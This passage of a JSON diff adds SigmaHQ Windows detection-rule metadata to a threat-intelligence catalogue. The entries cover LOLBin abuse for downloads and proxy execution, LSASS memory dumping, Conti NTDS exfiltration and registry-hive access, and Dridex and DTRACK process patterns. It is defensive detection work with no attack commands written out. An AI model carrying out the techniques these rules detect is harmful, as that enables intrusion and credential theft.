+ ], + "logsource.category": "process_creation", + "logsource.product": "windows" + } + }, + { + "description": "Detects the use of Replace.exe which can be used to replace file with another file", + "uuid": "9292293b-8496-4715-9db6-37028dcda4b3", + "value": "Replace.exe Usage", + "meta": { + "refs": [ + "https://lolbas-project.github.io/lolbas/Binaries/Replace/", + "https://docs.microsoft.com/en-us/windows-server/administration/windows-commands/replace", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_lolbin_replace.yml" + ], + "tags": [ + "attack.command_and_control", + "attack.t1105" + ], + "creation_date": "2022/03/06", + "filename": "proc_creation_win_lolbin_replace.yml", + "author": "frack113", + "level": "medium", + "falsepositive": [ + "Unknown" + ], + "logsource.category": "process_creation", + "logsource.product": "windows" + } + }, + { + "description": "An attacker may execute an application as a SCR File using rundll32.exe desk.cpl,InstallScreenSaver", + "uuid": "15bd98ea-55f4-4d37-b09a-e7caa0fa2221", + "value": "Rundll32 InstallScreenSaver Execution", + "meta": { + "refs": [ + "https://lolbas-project.github.io/lolbas/Libraries/Desk/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_lolbin_rundll32_installscreensaver.yml" + ], + "tags": [ + "attack.t1218.011", + "attack.defense_evasion" + ], + "creation_date": "2022/04/28", + "filename": "proc_creation_win_lolbin_rundll32_installscreensaver.yml", + "author": "Christopher Peacock @securepeacock, SCYTHE @scythe_io, TactiKoolSec", + "level": "medium", + "falsepositive": [ + "Legitimate installation of a new screensaver" + ], + "logsource.category": "process_creation", + "logsource.product": "windows" + } + }, + { + "description": "The \"ScriptRunner.exe\" binary can be abused to proxy execution through it and bypass possible whitelisting", + "uuid": "64760eef-87f7-4ed3-93fd-655668ea9420", + "value": "Use of 
Scriptrunner.exe", + "meta": { + "refs": [ + "https://lolbas-project.github.io/lolbas/Binaries/Scriptrunner/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_lolbin_scriptrunner.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.execution", + "attack.t1218" + ], + "creation_date": "2022/07/01", + "filename": "proc_creation_win_lolbin_scriptrunner.yml", + "author": "Nasreddine Bencherchali", + "level": "medium", + "falsepositive": [ + "Legitimate use when App-v is deployed" + ], + "logsource.category": "process_creation", + "logsource.product": "windows" + } + }, + { + "description": "Detects using SettingSyncHost.exe to run hijacked binary", + "uuid": "b2ddd389-f676-4ac4-845a-e00781a48e5f", + "value": "Using SettingSyncHost.exe as LOLBin", + "meta": { + "refs": [ + "https://www.hexacorn.com/blog/2020/02/02/settingsynchost-exe-as-a-lolbin", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_lolbin_settingsynchost.yml" + ], + "tags": [ + "attack.execution", + "attack.defense_evasion", + "attack.t1574.008" + ], + "creation_date": "2020/02/05", + "filename": "proc_creation_win_lolbin_settingsynchost.yml", + "author": "Anton Kutepov, oscd.community", + "level": "high", + "falsepositive": [ + "Unknown" + ], + "logsource.category": "process_creation", + "logsource.product": "windows" + } + }, + { + "description": "Detects the usage of the \"sftp.exe\" binary as a LOLBIN by abusing the \"-D\" flag", + "uuid": "a85ffc3a-e8fd-4040-93bf-78aff284d801", + "value": "Use Of The SFTP.EXE Binary As A LOLBIN", + "meta": { + "refs": [ + "https://github.com/LOLBAS-Project/LOLBAS/pull/264", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_lolbin_sftp.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.execution", + "attack.t1218" + ], + "creation_date": "2022/11/10", + "filename": "proc_creation_win_lolbin_sftp.yml", + 
"author": "Nasreddine Bencherchali", + "level": "medium", + "falsepositive": [ + "Unknown" + ], + "logsource.category": "process_creation", + "logsource.product": "windows" + } + }, + { + "description": "Detects the execution utitilies often found in Visual Studio tools that hardcode the call to the binary \"link.exe\". They can be abused to sideload any binary with the same name", + "uuid": "6e968eb1-5f05-4dac-94e9-fd0c5cb49fd6", + "value": "Sideloading Link.EXE", + "meta": { + "refs": [ + "https://twitter.com/0gtweet/status/1560732860935729152", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_lolbin_sideload_link_binary.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1218" + ], + "creation_date": "2022/08/22", + "filename": "proc_creation_win_lolbin_sideload_link_binary.yml", + "author": "Nasreddine Bencherchali", + "level": "medium", + "falsepositive": [ + "Unknown" + ], + "logsource.category": "process_creation", + "logsource.product": "windows" + } + }, + { + "description": "Detects the execution of sigverif binary as a parent process which could indicate it being used as a LOLBIN to proxy execution", + "uuid": "7d4aaec2-08ed-4430-8b96-28420e030e04", + "value": "Suspicious Sigverif Execution", + "meta": { + "refs": [ + "https://www.hexacorn.com/blog/2018/04/27/i-shot-the-sigverif-exe-the-gui-based-lolbin/", + "https://twitter.com/0gtweet/status/1457676633809330184", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_lolbin_sigverif.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1216" + ], + "creation_date": "2022/08/19", + "filename": "proc_creation_win_lolbin_sigverif.yml", + "author": "Nasreddine Bencherchali", + "level": "medium", + "falsepositive": [ + "Unknown" + ], + "logsource.category": "process_creation", + "logsource.product": "windows" + } + }, + { + "description": "The \"Squirrel.exe\" binary that is part of multiple software 
(Slack, Teams, Discord...etc) can be used as a LOLBIN", + "uuid": "45239e6a-b035-4aaf-b339-8ad379fcb67e", + "value": "Use of Squirrel.exe", + "meta": { + "refs": [ + "https://lolbas-project.github.io/lolbas/OtherMSBinaries/Squirrel/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_lolbin_squirrel.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.execution" + ], + "creation_date": "2022/06/09", + "filename": "proc_creation_win_lolbin_squirrel.yml", + "author": "Nasreddine Bencherchali", + "level": "medium", + "falsepositive": [ + "See rule (fa4b21c9-0057-4493-b289-2556416ae4d7) for possible FPs" + ], + "logsource.category": "process_creation", + "logsource.product": "windows" + } + }, + { + "description": "Detects suspicious LOLBIN AccCheckConsole execution with parameters as used to load an arbitrary DLL", + "uuid": "0f6da907-5854-4be6-859a-e9958747b0aa", + "value": "Suspicious LOLBIN AccCheckConsole", + "meta": { + "refs": [ + "https://gist.github.com/bohops/2444129419c8acf837aedda5f0e7f340", + "https://twitter.com/bohops/status/1477717351017680899?s=12", + "https://lolbas-project.github.io/lolbas/OtherMSBinaries/AccCheckConsole/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_lolbin_susp_acccheckconsole.yml" + ], + "tags": [ + "attack.execution" + ], + "creation_date": "2022/01/06", + "filename": "proc_creation_win_lolbin_susp_acccheckconsole.yml", + "author": "Florian Roth", + "level": "high", + "falsepositive": [ + "Legitimate use of the UI Accessibility Checker" + ], + "logsource.category": "process_creation", + "logsource.product": "windows" + } + }, + { + "description": "Atbroker executing non-deafualt Assistive Technology applications", + "uuid": "f24bcaea-0cd1-11eb-adc1-0242ac120002", + "value": "Suspicious Atbroker Execution", + "meta": { + "refs": [ + "http://www.hexacorn.com/blog/2016/07/22/beyond-good-ol-run-key-part-42/", + 
"https://lolbas-project.github.io/lolbas/Binaries/Atbroker/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_lolbin_susp_atbroker.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1218" + ], + "creation_date": "2020/10/12", + "filename": "proc_creation_win_lolbin_susp_atbroker.yml", + "author": "Mateusz Wydra, oscd.community", + "level": "high", + "falsepositive": [ + "Legitimate, non-default assistive technology applications execution" + ], + "logsource.category": "process_creation", + "logsource.product": "windows" + } + }, + { + "description": "Detects a suspicious certreq execution taken from the LOLBAS examples, which can be abused to download (small) files", + "uuid": "4480827a-9799-4232-b2c4-ccc6c4e9e12b", + "value": "Suspicious Certreq Command to Download", + "meta": { + "refs": [ + "https://lolbas-project.github.io/lolbas/Binaries/Certreq/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_lolbin_susp_certreq_download.yml" + ], + "tags": [ + "attack.command_and_control", + "attack.t1105" + ], + "creation_date": "2021/11/24", + "filename": "proc_creation_win_lolbin_susp_certreq_download.yml", + "author": "Christian Burkard", + "level": "high", + "falsepositive": [ + "Unlikely" + ], + "logsource.category": "process_creation", + "logsource.product": "windows" + } + }, + { + "description": "Detects when a possible suspicious driver is being installed via pnputil.exe lolbin", + "uuid": "a2ea3ae7-d3d0-40a0-a55c-25a45c87cac1", + "value": "Suspicious Driver Install by pnputil.exe", + "meta": { + "refs": [ + "https://docs.microsoft.com/en-us/windows-hardware/drivers/devtest/pnputil-command-syntax", + "https://strontic.github.io/xcyclopedia/library/pnputil.exe-60EDC5E6BDBAEE441F2E3AEACD0340D2.html", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_lolbin_susp_driver_installed_by_pnputil.yml" + ], + "tags": [ + 
"attack.persistence", + "attack.t1547" + ], + "creation_date": "2021/09/30", + "filename": "proc_creation_win_lolbin_susp_driver_installed_by_pnputil.yml", + "author": "Hai Vaknin @LuxNoBulIshit, Avihay eldad @aloneliassaf, Austin Songer @austinsonger", + "level": "medium", + "falsepositive": [ + "Pnputil.exe being used may be performed by a system administrator.", + "Verify whether the user identity, user agent, and/or hostname should be making changes in your environment.", + "Pnputil.exe being executed from unfamiliar users should be investigated. If known behavior is causing false positives, it can be exempted from the rule." + ], + "logsource.category": "process_creation", + "logsource.product": "windows" + } + }, + { + "description": "Detects execution of of Dxcap.exe", + "uuid": "60f16a96-db70-42eb-8f76-16763e333590", + "value": "Application Whitelisting Bypass via Dxcap.exe", + "meta": { + "refs": [ + "https://lolbas-project.github.io/lolbas/OtherMSBinaries/Dxcap/", + "https://twitter.com/harr0ey/status/992008180904419328", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_lolbin_susp_dxcap.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1218" + ], + "creation_date": "2019/10/26", + "filename": "proc_creation_win_lolbin_susp_dxcap.yml", + "author": "Beyu Denis, oscd.community, Nasreddine Bencherchali (update)", + "level": "medium", + "falsepositive": [ + "Legitimate execution of dxcap.exe by legitimate user" + ], + "logsource.category": "process_creation", + "logsource.product": "windows" + } + }, + { + "description": "Detects the suspicious execution of a utility to convert Windows 3.x .grp files or for persistence purposes by malicious software or actors", + "uuid": "f14e169e-9978-4c69-acb3-1cff8200bc36", + "value": "Suspicious GrpConv Execution", + "meta": { + "refs": [ + "https://twitter.com/0gtweet/status/1526833181831200770", + 
"https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_lolbin_susp_grpconv.yml" + ], + "tags": [ + "attack.persistence", + "attack.t1547" + ], + "creation_date": "2022/05/19", + "filename": "proc_creation_win_lolbin_susp_grpconv.yml", + "author": "Florian Roth", + "level": "high", + "falsepositive": [ + "Unknown" + ], + "logsource.category": "process_creation", + "logsource.product": "windows" + } + }, + { + "description": "Detect the use of Windows Defender to download payloads", + "uuid": "46123129-1024-423e-9fae-43af4a0fa9a5", + "value": "Windows Defender Download Activity", + "meta": { + "refs": [ + "https://web.archive.org/web/20200903194959/https://twitter.com/djmtshepana/status/1301608169496612866", + "https://lolbas-project.github.io/lolbas/Binaries/MpCmdRun/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_lolbin_susp_mpcmdrun_download.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1218", + "attack.command_and_control", + "attack.t1105" + ], + "creation_date": "2020/09/04", + "filename": "proc_creation_win_lolbin_susp_mpcmdrun_download.yml", + "author": "Matthew Matchen", + "level": "high", + "falsepositive": [ + "Unknown" + ], + "logsource.category": "process_creation", + "logsource.product": "windows" + } + }, + { + "description": "Detects process dump via legitimate sqldumper.exe binary", + "uuid": "23ceaf5c-b6f1-4a32-8559-f2ff734be516", + "value": "Dumping Process via Sqldumper.exe", + "meta": { + "refs": [ + "https://twitter.com/countuponsec/status/910977826853068800", + "https://twitter.com/countuponsec/status/910969424215232518", + "https://lolbas-project.github.io/lolbas/OtherMSBinaries/Sqldumper/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_lolbin_susp_sqldumper_activity.yml" + ], + "tags": [ + "attack.credential_access", + "attack.t1003.001" + ], + "creation_date": "2020/10/08", + 
"filename": "proc_creation_win_lolbin_susp_sqldumper_activity.yml", + "author": "Kirill Kiryanov, oscd.community", + "level": "medium", + "falsepositive": [ + "Legitimate MSSQL Server actions" + ], + "logsource.category": "process_creation", + "logsource.product": "windows" + } + }, + { + "description": "Detects Possible usage of Windows Subsystem for Linux (WSL) binary as a LOLBIN", + "uuid": "dec44ca7-61ad-493c-bfd7-8819c5faa09b", + "value": "WSL Execution", + "meta": { + "refs": [ + "https://lolbas-project.github.io/lolbas/OtherMSBinaries/Wsl/", + "https://twitter.com/nas_bench/status/1535431474429808642", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_lolbin_susp_wsl.yml" + ], + "tags": [ + "attack.execution", + "attack.defense_evasion", + "attack.t1218", + "attack.t1202" + ], + "creation_date": "2020/10/05", + "filename": "proc_creation_win_lolbin_susp_wsl.yml", + "author": "oscd.community, Zach Stanford @svch0st, Nasreddine Bencherchali", + "level": "medium", + "falsepositive": [ + "Automation and orchestration scripts may use this method execute scripts etc", + "Legitimate use by Windows to kill processes opened via WSL (example VsCode WSL server)" + ], + "logsource.category": "process_creation", + "logsource.product": "windows" + } + }, + { + "description": "Executes arbitrary PowerShell code using SyncAppvPublishingServer.exe.", + "uuid": "fbd7c32d-db2a-4418-b92c-566eb8911133", + "value": "SyncAppvPublishingServer Execute Arbitrary PowerShell Code", + "meta": { + "refs": [ + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1218/T1218.md", + "https://lolbas-project.github.io/lolbas/Binaries/Syncappvpublishingserver/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_lolbin_syncappvpublishingserver_execute_psh.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1218" + ], + "creation_date": 
"2021/07/12", + "filename": "proc_creation_win_lolbin_syncappvpublishingserver_execute_psh.yml", + "author": "frack113", + "level": "medium", + "falsepositive": [ + "App-V clients" + ], + "logsource.category": "process_creation", + "logsource.product": "windows" + } + }, + { + "description": "Executes arbitrary PowerShell code using SyncAppvPublishingServer.vbs", + "uuid": "36475a7d-0f6d-4dce-9b01-6aeb473bbaf1", + "value": "SyncAppvPublishingServer VBS Execute Arbitrary PowerShell Code", + "meta": { + "refs": [ + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1216/T1216.md", + "https://lolbas-project.github.io/lolbas/Binaries/Syncappvpublishingserver/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_lolbin_syncappvpublishingserver_vbs_execute_psh.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1218", + "attack.t1216" + ], + "creation_date": "2021/07/16", + "filename": "proc_creation_win_lolbin_syncappvpublishingserver_vbs_execute_psh.yml", + "author": "frack113", + "level": "medium", + "falsepositive": [ + "Unknown" + ], + "logsource.category": "process_creation", + "logsource.product": "windows" + } + }, + { + "description": "Detects the executiob of TTDInject.exe, which is used by Windows 10 v1809 and newer to debug time travel (underlying call of tttracer.exe)", + "uuid": "b27077d6-23e6-45d2-81a0-e2b356eea5fd", + "value": "Use of TTDInject.exe", + "meta": { + "refs": [ + "https://lolbas-project.github.io/lolbas/Binaries/Ttdinject/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_lolbin_ttdinject.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1127" + ], + "creation_date": "2022/05/16", + "filename": "proc_creation_win_lolbin_ttdinject.yml", + "author": "frack113", + "level": "medium", + "falsepositive": [ + "Legitimate use" + ], + "logsource.category": "process_creation", + 
"logsource.product": "windows" + } + }, + { + "description": "Detects usage of Time Travel Debugging Utility. Adversaries can execute malicious processes and dump processes, such as lsass.exe, via tttracer.exe.", + "uuid": "0b4ae027-2a2d-4b93-8c7e-962caaba5b2a", + "value": "Time Travel Debugging Utility Usage", + "meta": { + "refs": [ + "https://lolbas-project.github.io/lolbas/Binaries/Tttracer/", + "https://twitter.com/mattifestation/status/1196390321783025666", + "https://twitter.com/oulusoyum/status/1191329746069655553", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_lolbin_tttracer_mod_load.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.credential_access", + "attack.t1218", + "attack.t1003.001" + ], + "creation_date": "2020/10/06", + "filename": "proc_creation_win_lolbin_tttracer_mod_load.yml", + "author": "Ensar \u015eamil, @sblmsrsn, @oscd_initiative", + "level": "high", + "falsepositive": [ + "Legitimate usage by software developers/testers" + ], + "logsource.category": "process_creation", + "logsource.product": "windows" + } + }, + { + "description": "Detects the use of a Microsoft signed script executing a managed DLL with PowerShell.", + "uuid": "0403d67d-6227-4ea8-8145-4e72db7da120", + "value": "UtilityFunctions.ps1 Proxy Dll", + "meta": { + "refs": [ + "https://lolbas-project.github.io/lolbas/Scripts/UtilityFunctions/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_lolbin_utilityfunctions.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1216" + ], + "creation_date": "2022/05/28", + "filename": "proc_creation_win_lolbin_utilityfunctions.yml", + "author": "frack113", + "level": "medium", + "falsepositive": [ + "Unknown" + ], + "logsource.category": "process_creation", + "logsource.product": "windows" + } + }, + { + "description": "VisualUiaVerifyNative.exe is a Windows SDK that can be used for AWL bypass and is listed in 
Microsoft's recommended block rules.", + "uuid": "b30a8bc5-e21b-4ca2-9420-0a94019ac56a", + "value": "Use of VisualUiaVerifyNative.exe", + "meta": { + "refs": [ + "https://lolbas-project.github.io/lolbas/OtherMSBinaries/VisualUiaVerifyNative/", + "https://docs.microsoft.com/en-us/windows/security/threat-protection/windows-defender-application-control/microsoft-recommended-block-rules", + "https://bohops.com/2020/10/15/exploring-the-wdac-microsoft-recommended-block-rules-visualuiaverifynative/", + "https://github.com/MicrosoftDocs/windows-itpro-docs/commit/937db704b9148e9cee7c7010cad4d00ce9c4fdad", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_lolbin_visualuiaverifynative.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1218" + ], + "creation_date": "2022/06/01", + "filename": "proc_creation_win_lolbin_visualuiaverifynative.yml", + "author": "Christopher Peacock @SecurePeacock, SCYTHE @scythe_io", + "level": "medium", + "falsepositive": [ + "Legitimate testing of Microsoft UI parts." 
+ ], + "logsource.category": "process_creation", + "logsource.product": "windows" + } + }, + { + "description": "Detects successful code compilation via Visual Basic Command Line Compiler that utilizes Windows Resource to Object Converter.", + "uuid": "7b10f171-7f04-47c7-9fa2-5be43c76e535", + "value": "Visual Basic Command Line Compiler Usage", + "meta": { + "refs": [ + "https://lolbas-project.github.io/lolbas/Binaries/Vbc/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_lolbin_visual_basic_compiler.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1027.004" + ], + "creation_date": "2020/10/07", + "filename": "proc_creation_win_lolbin_visual_basic_compiler.yml", + "author": "Ensar \u015eamil, @sblmsrsn, @oscd_initiative", + "level": "high", + "falsepositive": [ + "Utilization of this tool should not be seen in enterprise environment" + ], + "logsource.category": "process_creation", + "logsource.product": "windows" + } + }, + { + "description": "The \"VSIISExeLauncher.exe\" binary part of the Visual Studio/VS Code can be used to execute arbitrary binaries", + "uuid": "18749301-f1c5-4efc-a4c3-276ff1f5b6f8", + "value": "Use of VSIISExeLauncher.exe", + "meta": { + "refs": [ + "https://lolbas-project.github.io/lolbas/OtherMSBinaries/VSIISExeLauncher/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_lolbin_vsiisexelauncher.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1127" + ], + "creation_date": "2022/06/09", + "filename": "proc_creation_win_lolbin_vsiisexelauncher.yml", + "author": "Nasreddine Bencherchali", + "level": "medium", + "falsepositive": [ + "Unknown" + ], + "logsource.category": "process_creation", + "logsource.product": "windows" + } + }, + { + "description": "The Workflow Command-line Compiler can be used for AWL bypass and is listed in Microsoft's recommended block rules.", + "uuid": "49be8799-7b4d-4fda-ad23-cafbefdebbc5", + 
"value": "Use of Wfc.exe", + "meta": { + "refs": [ + "https://lolbas-project.github.io/lolbas/OtherMSBinaries/Wfc/", + "https://docs.microsoft.com/en-us/windows/security/threat-protection/windows-defender-application-control/microsoft-recommended-block-rules", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_lolbin_wfc.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1127" + ], + "creation_date": "2022/06/01", + "filename": "proc_creation_win_lolbin_wfc.yml", + "author": "Christopher Peacock @SecurePeacock, SCYTHE @scythe_io", + "level": "medium", + "falsepositive": [ + "Legitimate use by a software developer" + ], + "logsource.category": "process_creation", + "logsource.product": "windows" + } + }, + { + "description": "Detects Winword process loading custmom dlls via the '/l' switch.\nWinword can be abused as a LOLBIN to download arbitrary file or load arbitrary DLLs.\n", + "uuid": "4ae3e30b-b03f-43aa-87e3-b622f4048eed", + "value": "Winword LOLBIN Usage", + "meta": { + "refs": [ + "https://lolbas-project.github.io/lolbas/OtherMSBinaries/Winword/", + "https://github.com/D4Vinci/One-Lin3r/blob/9fdfa5f0b9c698dfbd4cdfe7d2473192777ae1c6/one_lin3r/core/liners/windows/cmd/dll_loader_word.py", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_lolbin_winword.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1202" + ], + "creation_date": "2022/05/17", + "filename": "proc_creation_win_lolbin_winword.yml", + "author": "Nasreddine Bencherchali, Victor Sergeev, oscd.community", + "level": "high", + "falsepositive": [ + "Unknown" + ], + "logsource.category": "process_creation", + "logsource.product": "windows" + } + }, + { + "description": "Detects use of Wlrmdr.exe in which the -u parameter is passed to ShellExecute", + "uuid": "9cfc00b6-bfb7-49ce-9781-ef78503154bb", + "value": "Wlrmdr Lolbin Use as Launcher", + "meta": { + "refs": [ + 
"https://twitter.com/0gtweet/status/1493963591745220608?s=20&t=xUg9DsZhJy1q9bPTUWgeIQ", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_lolbin_wlrmdr.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1218" + ], + "creation_date": "2022/02/16", + "filename": "proc_creation_win_lolbin_wlrmdr.yml", + "author": "frack113, manasmbellani", + "level": "medium", + "falsepositive": [ + "Unknown" + ], + "logsource.category": "process_creation", + "logsource.product": "windows" + } + }, + { + "description": "Detects Too long PowerShell command lines", + "uuid": "d0d28567-4b9a-45e2-8bbc-fb1b66a1f7f6", + "value": "Too Long PowerShell Commandlines", + "meta": { + "refs": [ + "https://speakerdeck.com/heirhabarov/hunting-for-powershell-abuse", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_long_powershell_commandline.yml" + ], + "tags": [ + "attack.execution", + "attack.t1059.001" + ], + "creation_date": "2020/10/06", + "filename": "proc_creation_win_long_powershell_commandline.yml", + "author": "oscd.community, Natalia Shornikova", + "level": "low", + "falsepositive": [ + "Unknown" + ], + "logsource.category": "process_creation", + "logsource.product": "windows" + } + }, + { + "description": "Detect creation of dump files containing the memory space of lsass.exe, which contains sensitive credentials.\nIdentifies usage of Sysinternals procdump.exe to export the memory space of lsass.exe which contains sensitive credentials.\n", + "uuid": "ffa6861c-4461-4f59-8a41-578c39f3f23e", + "value": "LSASS Memory Dumping", + "meta": { + "refs": [ + "https://eqllib.readthedocs.io/en/latest/analytics/1e1ef6be-12fc-11e9-8d76-4d6bb837cda4.html", + "https://eqllib.readthedocs.io/en/latest/analytics/210b4ea4-12fc-11e9-8d76-4d6bb837cda4.html", + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1003/T1003.md", + 
"https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_lsass_dump.yml" + ], + "tags": [ + "attack.credential_access", + "attack.t1003.001" + ], + "creation_date": "2019/10/24", + "filename": "proc_creation_win_lsass_dump.yml", + "author": "E.M. Anhaus (originally from Atomic Blue Detections, Tony Lambert), oscd.community", + "level": "high", + "falsepositive": [ + "Unlikely" + ], + "logsource.category": "process_creation", + "logsource.product": "windows" + } + }, + { + "description": "Detects usage of the powerShell New-MailboxExportRequest Cmdlet to exports a mailbox to a remote or local share, as used in ProxyShell exploitations", + "uuid": "889719ef-dd62-43df-86c3-768fb08dc7c0", + "value": "Suspicious PowerShell Mailbox Export to Share", + "meta": { + "refs": [ + "https://youtu.be/5mqid-7zp8k?t=2481", + "https://blog.orange.tw/2021/08/proxylogon-a-new-attack-surface-on-ms-exchange-part-1.html", + "https://peterjson.medium.com/reproducing-the-proxyshell-pwn2own-exploit-49743a4ea9a1", + "https://m365internals.com/2022/10/07/hunting-in-on-premises-exchange-server-logs/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_mailboxexport_share.yml" + ], + "tags": [ + "attack.exfiltration" + ], + "creation_date": "2021/08/07", + "filename": "proc_creation_win_mailboxexport_share.yml", + "author": "Florian Roth", + "level": "critical", + "falsepositive": [ + "Unknown" + ], + "logsource.category": "process_creation", + "logsource.product": "windows" + } + }, + { + "description": "Detects a command used by conti to find volume shadow backups", + "uuid": "7b30e0a7-c675-4b24-8a46-82fa67e2433d", + "value": "Conti Volume Shadow Listing", + "meta": { + "refs": [ + "https://twitter.com/vxunderground/status/1423336151860002816?s=20", + "https://www.virustotal.com/gui/file/03e9b8c2e86d6db450e5eceec057d7e369ee2389b9daecaf06331a95410aa5f8/detection", + 
"https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_malware_conti.yml" + ], + "tags": [ + "attack.t1587.001", + "attack.resource_development" + ], + "creation_date": "2021/08/09", + "filename": "proc_creation_win_malware_conti.yml", + "author": "Max Altgelt, Tobias Michalski", + "level": "high", + "falsepositive": [ + "Unknown" + ], + "logsource.category": "process_creation", + "logsource.product": "windows" + } + }, + { + "description": "Detects a command used by conti to exfiltrate NTDS", + "uuid": "aa92fd02-09f2-48b0-8a93-864813fb8f41", + "value": "Conti NTDS Exfiltration Command", + "meta": { + "refs": [ + "https://twitter.com/vxunderground/status/1423336151860002816?s=20", + "https://www.virustotal.com/gui/file/03e9b8c2e86d6db450e5eceec057d7e369ee2389b9daecaf06331a95410aa5f8/detection", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_malware_conti_7zip.yml" + ], + "tags": [ + "attack.collection", + "attack.t1560" + ], + "creation_date": "2021/08/09", + "filename": "proc_creation_win_malware_conti_7zip.yml", + "author": "Max Altgelt, Tobias Michalski", + "level": "high", + "falsepositive": [ + "Unknown" + ], + "logsource.category": "process_creation", + "logsource.product": "windows" + } + }, + { + "description": "Detects a command that accesses password storing registry hives via volume shadow backups", + "uuid": "f57f8d16-1f39-4dcb-a604-6c73d9b54b3d", + "value": "Sensitive Registry Access via Volume Shadow Copy", + "meta": { + "refs": [ + "https://twitter.com/vxunderground/status/1423336151860002816?s=20", + "https://www.virustotal.com/gui/file/03e9b8c2e86d6db450e5eceec057d7e369ee2389b9daecaf06331a95410aa5f8/detection", + "https://pentestlab.blog/2018/07/04/dumping-domain-password-hashes/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_malware_conti_shadowcopy.yml" + ], + "tags": [ + "attack.impact", + "attack.t1490" + 
], + "creation_date": "2021/08/09", + "filename": "proc_creation_win_malware_conti_shadowcopy.yml", + "author": "Max Altgelt, Tobias Michalski", + "level": "high", + "falsepositive": [ + "Some rare backup scenarios" + ], + "logsource.category": "process_creation", + "logsource.product": "windows" + } + }, + { + "description": "Detects typical Dridex process patterns", + "uuid": "e6eb5a96-9e6f-4a18-9cdd-642cfda21c8e", + "value": "Dridex Process Pattern", + "meta": { + "refs": [ + "https://app.any.run/tasks/993daa5e-112a-4ff6-8b5a-edbcec7c7ba3", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_malware_dridex.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.privilege_escalation", + "attack.t1055", + "attack.discovery", + "attack.t1135", + "attack.t1033" + ], + "creation_date": "2019/01/10", + "filename": "proc_creation_win_malware_dridex.yml", + "author": "Florian Roth, oscd.community", + "level": "critical", + "falsepositive": [ + "Unlikely" + ], + "logsource.category": "process_creation", + "logsource.product": "windows" + } + }, + { + "description": "Detects specific process parameters as seen in DTRACK infections", + "uuid": "f1531fa4-5b84-4342-8f68-9cf3fdbd83d4", + "value": "DTRACK Process Creation", + "meta": { + "refs": [ + "https://securelist.com/my-name-is-dtrack/93338/", + "https://app.any.run/tasks/4bc9860d-ab51-4077-9e09-59ad346b92fd/", + "https://app.any.run/tasks/ce4deab5-3263-494f-93e3-afb2b9d79f14/", + 